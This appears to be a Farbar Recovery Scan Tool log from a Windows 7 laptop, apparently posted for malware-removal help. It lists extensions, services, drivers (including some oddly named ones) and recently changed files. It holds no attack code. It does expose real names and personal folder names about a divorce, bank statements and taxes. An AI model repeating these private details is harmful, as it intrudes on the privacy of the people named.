CHR Extension: (Plug-in Terminal Class) - C:\Users\Ric\AppData\Local\Google\Chrome\User Data\Default\Extensions\ajpgkpeckebdhofmmjfgcjjiiejpodla [2014-06-05]
CHR Extension: (Google Docs) - C:\Users\Ric\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2013-10-06]
CHR Extension: (Google Drive) - C:\Users\Ric\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2013-10-06]
CHR Extension: (Google Voice Search Hotword (Beta)) - C:\Users\Ric\AppData\Local\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2014-05-27]
CHR Extension: (YouTube) - C:\Users\Ric\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2011-12-21]
CHR Extension: (Google Search) - C:\Users\Ric\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2011-12-21]
CHR Extension: (Google Wallet) - C:\Users\Ric\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2013-09-04]
CHR Extension: (Gmail) - C:\Users\Ric\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2011-12-21]

==================== Services (Whitelisted) =================

R2 9734BF6A-2DCD-40f0-BAB0-5AAFEEBE1269; C:\Program Files (x86)\Roxio\BackOnTrack\App\SaibSVC.exe [457200 2009-06-02] ()
S3 Adobe LM Service; C:\Program Files (x86)\Common Files\Adobe Systems Shared\Service\Adobelmsvc.exe [72704 2011-03-02] (Adobe Systems) [File not signed]
R2 BcmBtRSupport; C:\Windows\system32\BtwRSupportService.exe [2255064 2013-10-28] (Broadcom Corporation.)
R2 BOT4Service; C:\Program Files (x86)\Roxio\BackOnTrack\App\BService.exe [32240 2010-07-14] ()
R2 CLCapSvc; C:\Program Files (x86)\ATI\Catalyst Media Center\Kernel\TV\CLCapSvc.exe [262239 2007-08-02] () [File not signed]
R2 CLSched; C:\Program Files (x86)\ATI\Catalyst Media Center\Kernel\TV\CLSched.exe [110685 2007-08-02] () [File not signed]
R2 CyberLink Media Library Service; C:\Program Files (x86)\ATI\Catalyst Media Center\Kernel\CLML_NTService\CLMLServer.exe [1073152 2007-08-02] (Cyberlink) [File not signed]
R2 Fitbit Connect; C:\Program Files (x86)\Fitbit Connect\FitbitConnectService.exe [1436192 2014-05-19] (Fitbit, Inc.)
R2 IJPLMSVC; C:\Program Files (x86)\Canon\IJPLM\IJPLMSVC.EXE [140456 2011-09-06] ()
S3 McComponentHostService; C:\Program Files\McAfee Security Scan\3.8.150\McCHSvc.exe [289256 2014-04-09] (McAfee, Inc.)
R2 PCPitstop Scheduling; C:\Program Files (x86)\PCPitstop\PCPitstopScheduleService.exe [86016 2010-09-13] (PC Pitstop LLC) [File not signed]
R2 QDLService2kDell; C:\Program Files (x86)\QUALCOMM\QDLService2k\QDLService2kDell.exe [330488 2010-01-14] (QUALCOMM, Inc.)
S3 RoxMediaDB13; C:\Program Files (x86)\Common Files\Roxio Shared\13.0\SharedCOM\RoxMediaDB13.exe [1099248 2010-07-16] (Sonic Solutions)
R2 STacSV; C:\Windows\System32\DriverStore\FileRepository\stwrt64.inf_amd64_neutral_0057cbec48a2d7cf\STacSV64.exe [244736 2010-01-21] (IDT, Inc.)
S3 SwitchBoard; C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [517096 2010-02-19] (Adobe Systems Incorporated) [File not signed]
R2 WMCoreService; C:\Program Files (x86)\Dell\Dell WWAN\WMCore\mini_WMCore.exe [447488 2009-11-26] () [File not signed]
S4 x10nets; C:\Program Files (x86)\Trivia Board Pro 4\X10nets.exe [20480 2001-11-12] (X10) [File not signed]

==================== Drivers (Whitelisted) ====================

S3 61883; C:\Windows\System32\DRIVERS\61883.sys [60288 2009-07-13] (Microsoft Corporation)
S3 ATIAVPCI; C:\Windows\System32\DRIVERS\atinavrr.sys [1200512 2007-07-05] (ATI Technologies Inc.)
R3 bcbtums; C:\Windows\System32\drivers\bcbtums.sys [170712 2013-10-28] (Broadcom Corporation.)
R3 ITECIRfilter; C:\Windows\System32\DRIVERS\ITECIRfilter.sys [28264 2011-03-22] (ITE Tech. Inc. )
S3 Netaapl; C:\Windows\System32\DRIVERS\netaapl64.sys [22528 2011-05-10] (Apple Inc.) [File not signed]
S3 RimUsb; C:\Windows\System32\Drivers\RimUsb_AMD64.sys [74752 2011-07-25] (Research In Motion Limited)
S3 RimVSerPort; C:\Windows\System32\DRIVERS\RimSerial_AMD64.sys [44032 2011-07-20] (Research in Motion Ltd)
R2 TurboB; C:\Windows\System32\DRIVERS\TurboB.sys [13784 2009-11-02] ()
U5 VWiFiFlt; C:\Windows\System32\Drivers\VWiFiFlt.sys [59904 2009-07-13] (Microsoft Corporation)
S3 catchme; \??\C:\ComboFix\catchme.sys [X]
S1 qnmokglx; \??\C:\Windows\system32\drivers\qnmokglx.sys [X]
S1 smvowoli; \??\C:\Windows\system32\drivers\smvowoli.sys [X]
S3 wanatw; system32\DRIVERS\wanatw64.sys [X]
S0 xnvdb; System32\drivers\cixf.sys [X]

==================== NetSvcs (Whitelisted) ===================

==================== One Month Created Files and Folders ========

2014-07-17 22:20 - 2014-07-17 22:20 - 00019115 _____ () C:\Users\Ric\Desktop\FRST.txt
2014-07-17 20:35 - 2014-07-17 20:35 - 11204096 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerInstaller.exe
2014-07-17 16:56 - 2014-07-17 16:56 - 00000000 ____D () C:\Program Files (x86)\ESET
2014-07-17 16:53 - 2014-07-17 16:55 - 02347384 _____ (ESET) C:\Users\Ric\Desktop\esetsmartinstaller_enu.exe
2014-07-17 09:58 - 2014-07-17 09:58 - 00026139 _____ () C:\ComboFix.txt
2014-07-17 09:02 - 2014-07-17 09:02 - 00026171 _____ () C:\ComboFix1st.txt
2014-07-16 19:49 - 2011-06-26 02:45 - 00256000 _____ () C:\Windows\PEV.exe
2014-07-16 19:49 - 2010-11-07 13:20 - 00208896 _____ () C:\Windows\MBR.exe
2014-07-16 19:49 - 2009-04-20 00:56 - 00060416 _____ (NirSoft) C:\Windows\NIRCMD.exe
2014-07-16 19:49 - 2000-08-30 20:00 - 00518144 _____ (SteelWerX) C:\Windows\SWREG.exe
2014-07-16 19:49 - 2000-08-30 20:00 - 00406528 _____ (SteelWerX) C:\Windows\SWSC.exe
2014-07-16 19:49 - 2000-08-30 20:00 - 00098816 _____ () C:\Windows\sed.exe
2014-07-16 19:49 - 2000-08-30 20:00 - 00080412 _____ () C:\Windows\grep.exe
2014-07-16 19:49 - 2000-08-30 20:00 - 00068096 _____ () C:\Windows\zip.exe
2014-07-16 19:44 - 2014-07-17 09:58 - 00000000 ____D () C:\Qoobox
2014-07-16 19:43 - 2014-07-16 22:06 - 00000000 ____D () C:\Windows\erdnt
2014-07-16 19:40 - 2014-07-16 19:40 - 05221447 ____R (Swearware) C:\Users\Ric\Desktop\ComboFix.exe
2014-07-16 11:10 - 2014-07-16 11:13 - 00056906 _____ () C:\Users\Ric\Desktop\Addition.txt
2014-07-16 10:53 - 2014-07-16 11:13 - 00063179 _____ () C:\Users\Ric\Desktop\FRST1.txt
2014-07-16 10:48 - 2014-07-17 22:20 - 00000000 ____D () C:\FRST
2014-07-16 10:47 - 2014-07-16 10:47 - 02086912 _____ (Farbar) C:\Users\Ric\Desktop\FRST64.exe
2014-07-15 23:25 - 2014-07-15 23:25 - 00021104 _____ () C:\Users\Ric\Desktop\dds.txt
2014-07-15 23:25 - 2014-07-15 23:25 - 00013578 _____ () C:\Users\Ric\Desktop\attach.txt
2014-07-15 23:04 - 2014-07-15 23:04 - 00688992 ____R (Swearware) C:\Users\Ric\Desktop\dds.com
2014-07-14 11:20 - 2014-07-14 11:20 - 00000207 _____ () C:\Windows\tweaking.com-regbackup-DELL-XPS-1645-Microsoft-Windows-7-Professional-(64-bit).dat
2014-07-14 11:20 - 2014-07-14 11:20 - 00000000 ____D () C:\RegBackup
2014-07-14 09:20 - 2014-07-14 09:20 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Tweaking.com
2014-07-14 09:20 - 2014-07-14 09:20 - 00000000 ____D () C:\Program Files (x86)\Tweaking.com
2014-07-12 13:01 - 2014-03-06 23:53 - 02925760 _____ (Sysinternals - www.sysinternals.com) C:\Users\Ric\Desktop\procexp.exe
2014-07-12 12:44 - 2014-07-12 22:45 - 00000004 _____ () C:\Windows\msoffice.ini
2014-07-12 12:44 - 2014-07-12 22:45 - 00000000 ____D () C:\Users\Ric\Desktop\AOL Saved PFC
2014-07-11 15:26 - 2014-07-11 15:26 - 00002358 _____ () C:\Users\Ric\Desktop\JRT.txt
2014-07-11 15:19 - 2014-07-11 15:19 - 00000000 ____D () C:\Windows\ERUNT
2014-07-11 14:58 - 2014-07-12 13:01 - 00000000 ____D () C:\Kits
2014-07-11 14:26 - 2014-07-11 14:26 - 01166640 _____ () C:\Windows\Minidump\071114-42635-01.dmp
2014-07-09 15:33 - 2014-07-09 15:34 - 00000000 ____D () C:\Users\roy\1
2014-07-06 14:20 - 2010-08-30 08:34 - 00536576 _____ (SQLite Development Team) C:\Windows\SysWOW64\sqlite3.dll
2014-07-06 14:17 - 2014-07-13 14:11 - 00000000 ____D () C:\AdwCleaner
2014-07-06 14:15 - 2014-07-06 14:15 - 00000000 ____D () C:\Users\Ric\AppData\Local\GHISLER
2014-07-06 13:47 - 2014-07-06 13:47 - 00000000 __SHD () C:\Users\roy\AppData\Local\EmieUserList
2014-07-06 13:47 - 2014-07-06 13:47 - 00000000 __SHD () C:\Users\roy\AppData\Local\EmieSiteList
2014-07-06 11:47 - 2014-07-14 11:00 - 00122584 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-07-06 11:46 - 2014-07-06 11:46 - 00001106 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-07-06 11:46 - 2014-07-06 11:46 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-07-06 11:46 - 2014-07-06 11:46 - 00000000 ____D () C:\ProgramData\Malwarebytes
2014-07-06 11:46 - 2014-07-06 11:46 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware
2014-07-06 11:46 - 2014-05-12 07:26 - 00091352 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2014-07-06 11:46 - 2014-05-12 07:26 - 00063704 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2014-07-06 11:46 - 2014-05-12 07:25 - 00025816 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys
2014-07-05 22:06 - 2014-07-05 22:06 - 00000000 ____D () C:\Users\roy\AppData\Local\GHISLER
2014-07-05 22:04 - 2014-07-05 22:04 - 00000736 _____ () C:\Users\Public\Desktop\Total Commander 64 bit.lnk
2014-07-05 22:04 - 2014-07-05 22:04 - 00000722 _____ () C:\Users\Public\Desktop\Total Commander.lnk
2014-07-05 22:04 - 2014-07-05 22:04 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Total Commander
2014-07-05 14:46 - 2014-07-05 14:46 - 00000000 ____D () C:\Users\roy\AppData\Roaming\Notepad++
2014-07-05 14:25 - 2014-07-05 14:25 - 00453480 _____ () C:\Users\roy\AppData\Local\GDIPFONTCACHEV1.DAT
2014-07-05 14:23 - 2014-07-05 14:23 - 00001417 _____ () C:\Users\roy\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2014-07-05 14:23 - 2014-07-05 14:23 - 00000000 ____D () C:\Users\roy\AppData\Roaming\Apple Computer
2014-07-05 14:23 - 2014-07-05 14:23 - 00000000 ____D () C:\Users\roy\AppData\Roaming\Adobe
2014-07-05 14:23 - 2014-07-05 14:23 - 00000000 ____D () C:\Users\roy\AppData\Local\Google
2014-07-05 14:22 - 2014-07-09 15:33 - 00000000 ____D () C:\Users\roy
2014-07-05 14:22 - 2014-07-05 14:22 - 00000020 ___SH () C:\Users\roy\ntuser.ini
2014-07-05 14:22 - 2014-07-05 14:22 - 00000000 ____D () C:\Users\roy\AppData\Local\VirtualStore
2014-07-05 14:22 - 2011-08-08 15:10 - 00000000 ____D () C:\Users\roy\AppData\Local\Microsoft Help
2014-07-05 14:22 - 2011-03-06 17:02 - 00000000 ____D () C:\Users\roy\AppData\Local\SoftThinks
2014-07-05 14:22 - 2011-02-26 00:54 - 00000000 ____D () C:\Users\roy\AppData\Roaming\Macromedia
2014-07-05 14:22 - 2009-07-14 00:54 - 00000000 ___RD () C:\Users\roy\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories
2014-07-05 14:22 - 2009-07-14 00:49 - 00000000 ___RD () C:\Users\roy\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance
2014-07-05 13:53 - 2014-07-05 13:53 - 00139544 ____H () C:\Users\Ric\Downloads\Donna Summer - Last Dance.mp3.z1a
2014-07-05 12:52 - 2014-07-13 13:30 - 00000000 ____D () C:\Roy
2014-07-04 13:27 - 2014-07-04 13:32 - 20787200 _____ () C:\Users\Ric\qdata2010.QDF
2014-07-04 04:24 - 2014-07-04 13:24 - 00001120 _____ () C:\Users\Ric\Downloads\qdata2010 (1)OFXLOG.DAT
2014-07-04 04:19 - 2014-07-04 13:28 - 20787200 _____ () C:\Users\Ric\Downloads\qdata2010 (1).qdf
2014-07-04 04:19 - 2014-07-04 04:19 - 20780389 _____ () C:\Users\Ric\Downloads\qdata2010 (2).qdf
2014-07-02 07:15 - 2014-07-02 07:15 - 00003288 _____ () C:\bootsqm.dat
2014-07-01 21:05 - 2014-07-07 22:27 - 00000000 ____D () C:\Users\Ric\Desktop\Cohey photos
2014-06-25 20:48 - 2014-07-07 23:57 - 00003194 _____ () C:\Windows\System32\Tasks\{72E0739B-EEC6-4FAB-AD23-1B069503C4B5}
2014-06-25 20:26 - 2014-06-25 20:50 - 00000961 ____H () C:\IPH.PH
2014-06-25 20:20 - 2014-06-25 20:20 - 00208400 _____ (AOL LLC.) C:\Users\Ric\Downloads\AOLDNLD.exe
2014-06-25 19:29 - 2014-06-25 19:30 - 00369792 _____ () C:\Windows\Minidump\062514-34335-01.dmp
2014-06-25 19:23 - 2014-07-01 15:28 - 20742144 _____ () C:\Users\Ric\Downloads\qdata2010.qdf
2014-06-25 19:23 - 2014-07-01 15:27 - 00000896 _____ () C:\Users\Ric\Downloads\qdata2010OFXLOG.DAT
2014-06-23 19:36 - 2014-07-07 22:27 - 00000000 ____D () C:\Users\Ric\Desktop\EB PICS
2014-06-23 19:04 - 2014-06-23 19:05 - 00370536 _____ () C:\Windows\Minidump\062314-33337-01.dmp
2014-06-20 21:32 - 2014-06-20 21:32 - 00000000 ____D () C:\Users\Ric\Documents\Roxio Projects
2014-06-20 21:25 - 2014-07-07 22:27 - 00000000 ____D () C:\Users\Ric\Desktop\Mary picture folder
2014-06-18 16:45 - 2014-07-07 22:27 - 00000000 ____D () C:\Users\Ric\Documents\Divorce Civi lCover Sheet
2014-06-18 16:44 - 2014-06-18 16:45 - 01051112 _____ () C:\Users\Ric\Documents\Divorce Civi lCover Sheet.zip
2014-06-18 16:31 - 2014-06-18 16:32 - 00378088 _____ () C:\Windows\Minidump\061814-37799-01.dmp
2014-06-18 16:20 - 2014-06-18 16:20 - 00262144 _____ () C:\Windows\Minidump\061814-48672-01.dmp
2014-06-18 09:49 - 2014-06-18 09:49 - 00000000 ____D () C:\ProgramData\Package Cache
2014-06-18 09:48 - 2014-06-18 09:48 - 00000000 ____D () C:\TDSSKiller_Quarantine
2014-06-18 09:47 - 2014-06-18 09:47 - 00000000 ____D () C:\AMD
2014-06-18 09:39 - 2014-06-18 09:40 - 00569856 _____ () C:\Windows\Minidump\061814-35069-01.dmp
2014-06-17 16:54 - 2014-06-17 16:55 - 00369840 _____ () C:\Windows\Minidump\061714-74116-01.dmp
2014-06-17 16:42 - 2014-06-17 16:43 - 00369808 _____ () C:\Windows\Minidump\061714-29546-01.dmp

==================== One Month Modified Files and Folders =======

2014-07-17 22:21 - 2014-07-17 22:20 - 00019115 _____ () C:\Users\Ric\Desktop\FRST.txt
2014-07-17 22:20 - 2014-07-16 10:48 - 00000000 ____D () C:\FRST
2014-07-17 22:20 - 2009-07-14 01:13 - 00006728 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-07-17 22:16 - 2011-08-28 11:40 - 00000900 _____ () C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-3536542363-2189832666-3084334477-1001UA.job
2014-07-17 22:15 - 2013-10-06 14:24 - 00000892 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2014-07-17 21:35 - 2012-03-31 11:56 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job
2014-07-17 20:35 - 2014-07-17 20:35 - 11204096 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerInstaller.exe
2014-07-17 20:35 - 2012-03-31 11:56 - 00699056 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2014-07-17 20:35 - 2012-03-31 11:56 - 00003768 _____ () C:\Windows\System32\Tasks\Adobe Flash Player Updater
2014-07-17 20:35 - 2011-05-18 15:14 - 00071344 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2014-07-17 19:37 - 2011-02-25 23:12 - 01368929 _____ () C:\Windows\WindowsUpdate.log
2014-07-17 16:56 - 2014-07-17 16:56 - 00000000 ____D () C:\Program Files (x86)\ESET
2014-07-17 16:55 - 2014-07-17 16:53 - 02347384 _____ (ESET) C:\Users\Ric\Desktop\esetsmartinstaller_enu.exe
2014-07-17 16:54 - 2009-07-14 00:45 - 00013792 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-07-17 16:54 - 2009-07-14 00:45 - 00013792 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-07-17 16:46 - 2014-06-07 19:57 - 00011046 _____ () C:\Windows\setupact.log
2014-07-17 16:46 - 2013-10-06 14:24 - 00000888 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2014-07-17 16:46 - 2009-07-14 01:08 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-07-17 13:22 - 2013-02-14 10:26 - 00415468 _____ () C:\Windows\PFRO.log
2014-07-17 13:16 - 2011-08-28 11:40 - 00000848 _____ () C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-3536542363-2189832666-3084334477-1001Core.job
2014-07-17 09:58 - 2014-07-17 09:58 - 00026139 _____ () C:\ComboFix.txt
2014-07-17 09:58 - 2014-07-16 19:44 - 00000000 ____D () C:\Qoobox
2014-07-17 09:56 - 2009-07-13 22:34 - 00000215 _____ () C:\Windows\system.ini
2014-07-17 09:02 - 2014-07-17 09:02 - 00026171 _____ () C:\ComboFix1st.txt
2014-07-17 07:44 - 2011-03-25 16:29 - 00000000 ____D () C:\ProgramData\PCPitstop
2014-07-16 22:55 - 2013-12-12 09:53 - 00000000 ____D () C:\Users\Ric\Documents\POOL
2014-07-16 22:08 - 2011-03-05 13:45 - 00000000 ____D () C:\Users\Vincent  DAmico
2014-07-16 22:08 - 2011-03-05 13:45 - 00000000 ____D () C:\Users\TEMP
2014-07-16 22:08 - 2011-03-05 13:45 - 00000000 ____D () C:\Users\Ric Mitchell
2014-07-16 22:08 - 2011-03-05 13:45 - 00000000 ____D () C:\Users\Mary Fitzgerald
2014-07-16 22:08 - 2011-03-05 13:45 - 00000000 ____D () C:\Users\Administrator
2014-07-16 22:08 - 2009-07-13 23:20 - 00000000 __RHD () C:\Users\Default
2014-07-16 22:06 - 2014-07-16 19:43 - 00000000 ____D () C:\Windows\erdnt
2014-07-16 20:04 - 2011-02-25 21:20 - 00000000 ____D () C:\Users\Ric
2014-07-16 19:40 - 2014-07-16 19:40 - 05221447 ____R (Swearware) C:\Users\Ric\Desktop\ComboFix.exe
2014-07-16 11:13 - 2014-07-16 11:10 - 00056906 _____ () C:\Users\Ric\Desktop\Addition.txt
2014-07-16 11:13 - 2014-07-16 10:53 - 00063179 _____ () C:\Users\Ric\Desktop\FRST1.txt
2014-07-16 10:47 - 2014-07-16 10:47 - 02086912 _____ (Farbar) C:\Users\Ric\Desktop\FRST64.exe
2014-07-15 23:25 - 2014-07-15 23:25 - 00021104 _____ () C:\Users\Ric\Desktop\dds.txt
2014-07-15 23:25 - 2014-07-15 23:25 - 00013578 _____ () C:\Users\Ric\Desktop\attach.txt
2014-07-15 23:04 - 2014-07-15 23:04 - 00688992 ____R (Swearware) C:\Users\Ric\Desktop\dds.com
2014-07-15 14:10 - 2011-02-25 21:53 - 00453480 _____ () C:\Users\Ric\AppData\Local\GDIPFONTCACHEV1.DAT
2014-07-14 13:32 - 2009-07-14 00:45 - 05809096 _____ () C:\Windows\system32\FNTCACHE.DAT
2014-07-14 13:27 - 2011-02-26 12:01 - 00006728 _____ () C:\Windows\SysWOW64\PerfStringBackup.INI
2014-07-14 11:20 - 2014-07-14 11:20 - 00000207 _____ () C:\Windows\tweaking.com-regbackup-DELL-XPS-1645-Microsoft-Windows-7-Professional-(64-bit).dat
2014-07-14 11:20 - 2014-07-14 11:20 - 00000000 ____D () C:\RegBackup
2014-07-14 11:00 - 2014-07-06 11:47 - 00122584 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-07-14 09:20 - 2014-07-14 09:20 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Tweaking.com
2014-07-14 09:20 - 2014-07-14 09:20 - 00000000 ____D () C:\Program Files (x86)\Tweaking.com
2014-07-13 14:11 - 2014-07-06 14:17 - 00000000 ____D () C:\AdwCleaner
2014-07-13 13:30 - 2014-07-05 12:52 - 00000000 ____D () C:\Roy
2014-07-12 22:46 - 2011-02-26 14:14 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AOL
2014-07-12 22:46 - 2011-02-26 14:13 - 00000000 ____D () C:\ProgramData\AOL
2014-07-12 22:45 - 2014-07-12 12:44 - 00000004 _____ () C:\Windows\msoffice.ini
2014-07-12 22:45 - 2014-07-12 12:44 - 00000000 ____D () C:\Users\Ric\Desktop\AOL Saved PFC
2014-07-12 22:45 - 2011-02-26 14:14 - 00000000 ____D () C:\Users\Ric\AppData\Roaming\AOL
2014-07-12 13:01 - 2014-07-11 14:58 - 00000000 ____D () C:\Kits
2014-07-12 12:22 - 2014-01-31 12:35 - 00000367 _____ () C:\dldt.log
2014-07-12 12:22 - 2011-02-25 21:59 - 00000000 ____D () C:\Program Files (x86)\Dell
2014-07-12 11:50 - 2012-10-31 11:16 - 00000990 _____ () C:\ProgramData\dlea.log
2014-07-12 11:50 - 2011-03-03 17:30 - 00274947 _____ () C:\ProgramData\dleascan.log
2014-07-11 16:25 - 2011-02-26 12:00 - 00000000 ____D () C:\Windows\en
2014-07-11 15:26 - 2014-07-11 15:26 - 00002358 _____ () C:\Users\Ric\Desktop\JRT.txt
2014-07-11 15:19 - 2014-07-11 15:19 - 00000000 ____D () C:\Windows\ERUNT
2014-07-11 14:26 - 2014-07-11 14:26 - 01166640 _____ () C:\Windows\Minidump\071114-42635-01.dmp
2014-07-11 14:26 - 2014-06-10 08:38 - 663370964 _____ () C:\Windows\MEMORY.DMP
2014-07-11 14:26 - 2011-04-01 13:13 - 00000000 ____D () C:\Windows\Minidump
2014-07-10 12:32 - 2009-07-13 23:20 - 00000000 ___HD () C:\Windows\system32\GroupPolicy
2014-07-09 17:57 - 2013-03-21 13:42 - 00000000 ____D () C:\Windows\pss
2014-07-09 15:34 - 2014-07-09 15:33 - 00000000 ____D () C:\Users\roy\1
2014-07-09 15:33 - 2014-07-05 14:22 - 00000000 ____D () C:\Users\roy
2014-07-07 23:57 - 2014-06-25 20:48 - 00003194 _____ () C:\Windows\System32\Tasks\{72E0739B-EEC6-4FAB-AD23-1B069503C4B5}
2014-07-07 23:56 - 2011-12-12 12:39 - 00003342 _____ () C:\Windows\System32\Tasks\{7677B741-0E06-4511-B4C6-F7582CC2898C}
2014-07-07 23:55 - 2014-06-16 09:13 - 00003442 _____ () C:\Windows\System32\Tasks\PCDEventLauncherTask
2014-07-07 23:55 - 2014-06-16 09:13 - 00003204 _____ () C:\Windows\System32\Tasks\SystemToolsDailyTest
2014-07-07 23:55 - 2011-02-26 00:21 - 00003940 _____ () C:\Windows\System32\Tasks\User_Feed_Synchronization-{05BF1867-8CD9-4C56-919F-A77D7EF5FBBD}
2014-07-07 23:54 - 2014-06-16 09:13 - 00003992 _____ () C:\Windows\System32\Tasks\PCDoctorBackgroundMonitorTask
2014-07-07 23:45 - 2011-02-27 19:51 - 00000000 ____D () C:\ProgramData\Sonic
2014-07-07 23:44 - 2013-11-28 18:33 - 00000000 ____D () C:\Program Files\Google
2014-07-07 23:44 - 2012-01-02 14:21 - 00000000 ____D () C:\Program Files (x86)\Google
2014-07-07 23:35 - 2011-08-28 11:40 - 00000000 ____D () C:\Users\Ric\AppData\Local\Google
2014-07-07 22:27 - 2014-07-01 21:05 - 00000000 ____D () C:\Users\Ric\Desktop\Cohey photos
2014-07-07 22:27 - 2014-06-23 19:36 - 00000000 ____D () C:\Users\Ric\Desktop\EB PICS
2014-07-07 22:27 - 2014-06-20 21:25 - 00000000 ____D () C:\Users\Ric\Desktop\Mary picture folder
2014-07-07 22:27 - 2014-06-18 16:45 - 00000000 ____D () C:\Users\Ric\Documents\Divorce Civi lCover Sheet
2014-07-07 22:27 - 2014-06-16 16:04 - 00000000 ____D () C:\Users\Ric\Documents\Divorce folder
2014-07-07 22:27 - 2014-06-16 09:38 - 00000000 ____D () C:\ProgramData\QUALCOMM
2014-07-07 22:27 - 2014-06-14 15:08 - 00000000 ____D () C:\Users\Ric\Desktop\Square Pics
2014-07-07 22:27 - 2014-06-13 10:48 - 00000000 ____D () C:\Users\Ric\Desktop\Monkey Trip
2014-07-07 22:27 - 2014-06-11 07:32 - 00000000 ____D () C:\Users\Ric\Documents\Knott karaoke files
2014-07-07 22:27 - 2014-06-11 07:32 - 00000000 ____D () C:\Users\Ric\Documents\Fernandina and Friends Trivia Night 2014
2014-07-07 22:27 - 2014-06-03 11:38 - 00000000 ____D () C:\Users\Ric\AppData\Local\Intuit
2014-07-07 22:27 - 2014-06-01 16:23 - 00000000 ____D () C:\ProgramData\FitbitConnect
2014-07-07 22:27 - 2014-05-27 09:11 - 00000000 ____D () C:\Users\Ric\Documents\Mary divorce folder
2014-07-07 22:27 - 2014-05-21 07:51 - 00000000 ____D () C:\Users\Ric\Documents\Landale Hanlon Trivia Night 7-3-14
2014-07-07 22:27 - 2014-05-17 16:47 - 00000000 ____D () C:\Users\Ric\Documents\Ric's Extreme Bingo Parrty Cards
2014-07-07 22:27 - 2014-04-23 16:21 - 00000000 ____D () C:\Users\Ric\Documents\Chase statements
2014-07-07 22:27 - 2014-04-09 07:11 - 00000000 ____D () C:\Users\Ric\Documents\Ric's Extreme Bingo Traditional cards
2014-07-07 22:27 - 2014-04-05 18:35 - 00000000 ____D () C:\Users\Ric\Documents\Ric's Extreme Bingo Oldies cards
2014-07-07 22:27 - 2014-04-01 08:05 - 00000000 ____D () C:\Users\Ric\Documents\Villages Entertainment Blank W-9 and Square info
2014-07-07 22:27 - 2014-03-31 08:01 - 00000000 ____D () C:\Users\Ric\Documents\Villages Entertainment
2014-07-07 22:27 - 2014-03-23 18:47 - 00000000 ___HD () C:\Users\Ric\Documents\.picasaoriginals
2014-07-07 22:27 - 2014-03-17 17:34 - 00000000 ____D () C:\Users\Ric\Documents\BINGOEVENTpayout
2014-07-07 22:27 - 2014-03-13 17:18 - 00000000 ____D () C:\Users\Ric\Documents\Charlotte Club Music Trivia
2014-07-07 22:27 - 2014-02-28 12:18 - 00000000 ____D () C:\Users\Ric\Documents\Water Oak Trivia
2014-07-07 22:27 - 2014-02-26 10:00 - 00000000 ____D () C:\Users\Ric\Documents\Bingo Card Diagrams
2014-07-07 22:27 - 2014-02-24 09:23 - 00000000 ____D () C:\Users\Ric\Documents\2013 Tax Return Package Orlando
2014-07-07 22:27 - 2014-02-13 10:47 - 00000000 ____D () C:\Users\Ric\Documents\Celebration Athletes app licationRicMitchellw92013
2014-07-07 22:27 - 2013-12-19 13:03 - 00000000 ____D () C:\Users\Ric\Documents\2013 Tax Package Orlando
2014-07-07 22:27 - 2013-09-24 12:02 - 00000000 ____D () C:\Users\Ric\AppData\Local\CE614ED5-C555-4E18-B719-E22F8ED8BAE5.aplzod
2014-07-07 22:27 - 2013-08-04 14:51 - 00000000 ____D () C:\Users\Ric\Documents\POLO RIDGE TRIVIA
2014-07-07 22:27 - 2013-08-04 14:51 - 00000000 ____D () C:\Users\Ric\Documents\MALLORY TRIVIA
2014-07-07 22:27 - 2013-08-04 14:51 - 00000000 ____D () C:\Users\Ric\Documents\Citrus Hill Music File questions
2014-07-07 22:27 - 2013-06-02 16:22 - 00000000 ____D () C:\Users\Ric\Documents\Landale Hanlon Trivia Night 7-3-13
2014-07-07 22:27 - 2013-05-30 09:19 - 00000000 ____D () C:\Users\Ric\AppData\Local\Amazon Cloud Player
2014-07-07 22:27 - 2013-05-23 17:28 - 00000000 ___HD () C:\ProgramData\CanonBJ
